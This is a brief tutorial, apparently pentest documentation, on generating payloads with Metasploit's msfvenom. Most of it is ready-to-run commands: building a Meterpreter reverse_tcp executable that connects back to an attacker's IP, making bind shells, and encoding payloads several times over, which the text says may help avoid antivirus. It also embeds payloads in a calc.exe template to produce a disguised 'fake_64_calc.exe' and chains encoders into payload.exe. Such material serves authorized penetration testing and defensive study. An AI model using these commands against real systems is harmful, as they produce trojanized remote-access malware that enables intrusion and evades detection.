To see what payloads are available from Framework, you can do:
./msfvenom -l payloads
Typically, this is probably how you will use msfvenom:
$ ./msfvenom -p windows/meterpreter/reverse_tcp lhost=[Attacker's IP] lport=4444 -f exe -o /tmp/my_payload.exe
How to use Msfvenom encode a payload
By default, the encoding feature will automatically kick in when you use the -b flag (the badchar flag). In other cases, you must use the -e flag like the following:
./msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai -f raw
To find out what encoders you can use, you can use the -l flag:
./msfvenom -l encoders
You can also encode the payload multiple times using the -i flag. Sometimes more iterations may help avoiding antivirus, but know that encoding isn’t really meant to be used a real AV evasion solution:
./msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai -i 3
How to avoid bad characters
The -b flag is meant to be used to avoid certain characters in the payload. When this option is used, msfvenom will automatically find a suitable encoder to encode the payload:
./msfvenom -p windows/meterpreter/bind_tcp -b '\x00' -f raw
How to supply a custom template using msfvenom
By default, msfvenom uses templates from the msf/data/templates directory. If you’d like to choose your own, you can use the -x flag like the following:
./msfvenom -p windows/meterpreter/bind_tcp -x calc.exe -f exe > new.exe
Please note: If you’d like to create a x64 payload with a custom x64 custom template for Winodws, then instead of the exe format, you should use exe-only:
./msfvenom -p windows/x64/meterpreter/bind_tcp -x /tmp/templates/64_calc.exe -f exe-only > /tmp/fake_64_calc.exe
The -x flag is often paired with the -k flag, which allows you to run your payload as a new thread from the template. However, this currently is only reliable for older Windows machines such as x86 Windows XP.
How to chain msfvenom output
The old
msfpayload and msfencode utilities were often chained together in order layer on multiple encodings. This is possible using msfvenom as well:./msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.3 LPORT=4444 -f raw -e x86/shikata_ga_nai -i 5 | \
./msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | \
./msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 9 -f exe -o payload.exe
MSFVENOM is a promising addition to Metasploit framework